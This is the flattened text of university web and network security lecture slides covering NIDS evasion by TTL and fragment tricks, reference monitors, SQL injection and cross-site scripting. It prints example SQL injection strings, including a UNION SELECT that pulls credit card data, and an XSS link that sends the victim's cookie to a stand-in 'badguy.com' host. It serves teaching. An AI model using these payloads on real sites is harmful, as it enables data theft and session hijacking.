Web Security Dawn Song dawnsong cs berkeley edu 1 Some slides from John Mitechell NIDS Evasion Normalization Problems Complete fragment reassembly necessary to detect certain attacks NIDS only has partial knowledge of what traffic the host sees e g TTL expires MTU Ambiguities in TCP IP e g Overlapping IP TCP fragments Different OS implement standard differently 2 Small TTL Attack NIDS sees A T T I A C K NIDS Internet Host EndEnd host sees Attacker Attacker s data stream A T T I A C K A T T A C K same TCP seq I has short TTL 3 Fragmentation Overlap Attack NIDS sees A T T A I C K NIDS Internet Host EndEnd host sees Attacker Attacker s data stream A T T A I C K A T T A I C same TCP seq or same IP frag offset K 4 Solution Traffic Normalizer Introduce bump in the wire traffic normalizer to evade protocol ambiguities Drop overlapping IP TCP fragments Increase TTL in packets with low TTL NIDS Internet Normalizer Host Other approaches Host based IDS Detailed Intranet map 5 Stealth Port Scanning IP id field used for stealth port scanning 6 Principle Reference Monitor SFI System call interposition VMM introspection Firewall NIDS one thing in common One enforcement mechanism reference monitor Examines every request to access any controlled resource an object and determines whether to allow request Subject Request Reference Monitor Object 7 Reference Monitor Security Properties Always invoked Complete mediation property all security relevant operations must be mediated by RM RM should be invoked on every operation controlled by access control policy Tamper resistant Maintain RM integrity no code state tampering Verifiable Can verify RM correctness correctly enforces desired access control policy Requires extremely simple RM Can t verify correctness for systems with any appreciable degree of complexity 8 Web Security Web new platform for many security critical applications e g banking e commerce Web security complex constantly evolving A two sided story Web application code Runs at web site on web server or app server Written in PHP ASP JSP Ruby Question secure web site design Web browser next lecture Can be attacked by any website it visits Attacks result in computer compromise malware installation etc Question secure web browser 9 Secure Web Site Design Today s web is dynamic Complex web applications Runs on web server or app server Takes input from web users via web server Interacts with databases 3rd parties Prepare results for users via web server Examples Shopping carts on line banking bill pay tax prep etc Challenges New code written for every web site often with little security considerations Many potential vulnerabilities 10 Common Vulnerabilities Input validation SQL Injection XSS cross site scripting HTTP response splitting Cookie management CSRF cross site request forgery 11 SQL Injection 12 Dynamic Web Application GET HTTP 1 0 Browser HTTP 1 1 200 OK Web server index php Database server 13 13 Basic picture SQL Injection Victim Server 1 pos cious t mali form 2 unintended query 3 receive valuable data Attacker Victim SQL DB 14 14 What is SQL Injection Input Validation Vulnerability untrusted user input in SQL query to back end database without sanitizing the data Specific case of more general command injection inserting untrusted input into a query or command Why Bad supplied data can be misinterpreted as a command could alter the intended effect of command or query 15 15 SQL Injection Example View pizza order history br form method post action Month select option name month value 1 Jan option option name month value 12 Dec option select Year p input type submit name submit value View form Attacker can post form that is not generated by this page 16 16 SQL Injection Example Normal SQL Query SELECT pizza toppings quantity order day FROM orders WHERE userid 4123 AND order month 10 For order month parameter attacker could input 0 OR 1 1 Malicious Query WHERE condition is always true Gives attacker access to other users private data WHERE userid 4123 AND order month 0 OR 1 1 17 17 SQL Injection Example All User Data Compromised 18 18 SQL Injection Example A more damaging example For order month parameter attacker could input 0 AND 1 0 UNION SELECT cardholder number exp month exp year FROM creditcards Attacker is able to Combine the results of two queries Empty table from first query with the sensitive credit card info of all users from second query 19 19 SQL Injection Example Credit Card Info Compromised 20 20 More Attacks Create new users INSERT INTO USERS uname passwd salt VALUES hacker 38a74f 3234 Password reset UPDATE USERS SET email hcker root org WHERE email victim yahoo com 21 22 It s not a joke It s real CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263 000 credit card s stolen from database credit card s stored unencrypted 43 million credit card s exposed 23 23 Cross Site Scripting XSS Attacks 24 Basic picture Cross site scripting Attacker Website eb site visit w e s p ag aliciou ive m ta 2 rece a able d d valu 5 sen 1 User Victim 4 3 echo click user on li nk inpu t Vulnerable Server Website 25 25 The setup User input is echoed into HTML response Example search field http victim com search php term apple search php responds with HTML TITLE Search Results TITLE BODY Results for php echo GET term BODY HTML Is this exploitable 26 Dan Boneh Bad input Problem no validation of input term Consider link properly URL encoded http victim com search php term script window open http badguy com cookie document cookie script What if user clicks on this link 1 Browser goes to victim com search php 2 Victim com returns HTML Results for script script 3 Browser executes script Sends badguy com cookie for victim com 27 Dan Boneh So what Why would user click on such a link Phishing email in webmail client e g gmail Link in doubleclick banner ad many many ways to fool user into clicking What if badguy com gets cookie for victim com Cookie can include session auth for victim com Or other data intended only for victim com Violates same origin policy 28 Dan Boneh Even worse Attacker can execute arbitrary scripts in browser Can manipulate any DOM component on victim com Control links on page Control form fields e g password field on this page and linked pages Can infect other users MySpace com worm 29 Dan Boneh MySpace com Samy worm Users can post HTML on their pages MySpace com ensures HTML contains no script body onclick a href
View Full Document
Unlocking...